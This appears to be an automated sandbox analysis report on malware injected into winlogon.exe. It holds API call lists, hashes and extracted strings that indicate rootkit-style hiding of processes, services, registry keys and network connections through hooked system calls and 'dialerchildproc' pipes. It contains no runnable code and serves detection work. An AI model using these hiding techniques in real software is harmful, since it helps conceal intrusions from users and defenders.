                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Execution Graph

                                                                                Execution Coverage: 1.3%
                                                                                Dynamic/Decrypted Code Coverage: 94.4%
                                                                                Signature Coverage: 0%
                                                                                Total number of Nodes: 107
                                                                                Total number of Limit Nodes: 16
                                                                                [Execution graph rendering omitted; API nodes shown in the graph: SetThreadContext, VirtualProtect, FlushInstructionCache, VirtualFree, GetCurrentProcess, ResumeThread, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, VirtualAlloc, LoadLibraryA, StrCmpNIW, VirtualQuery, GetLastError, GetProcessHeap, Sleep, SleepEx, StrCmpIW, StrCmpW, RegOpenKeyExW, RegCloseKey, RegQueryInfoKeyW, RegEnumValueW]

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering of function 1e858985b30 omitted; API nodes shown in the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40

                                                                                Control-flow Graph

                                                                                [Control-flow graph rendering of function 1e8589850d0 omitted; API nodes shown in the graph: GetCurrentThreadId, VirtualProtect, GetLastError]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 [Control-flow graph of the function at 1e85895273c-1e8589529d0 (rendered graph omitted): calls subroutine 1e8589529d4 (x4), VirtualAlloc and LoadLibraryA; nodes marked Executed / Not Executed]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                                  • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                                • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                                • SleepEx.KERNELBASE ref: 000001E858981ADD
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 [Control-flow graph of the function at 1e8589b273c-1e8589b29d0 (rendered graph omitted): calls subroutine 1e8589b29d4 (x4) and VirtualAlloc; nodes marked Executed / Not Executed]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                                • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                                • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                 [Control-flow graph of the function at 1e8589b6910-1e8589b6c2c (rendered graph omitted): CRT DllMain-style startup routine referencing __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c, with calls to subroutines 1e8589b6fc0, 1e8589b6e54, 1e8589b7190, 1e8589b268c, 1e8589c5780, 1e8589babc8 and others; nodes marked Executed / Not Executed]
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                                  • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                                  • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                                  • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
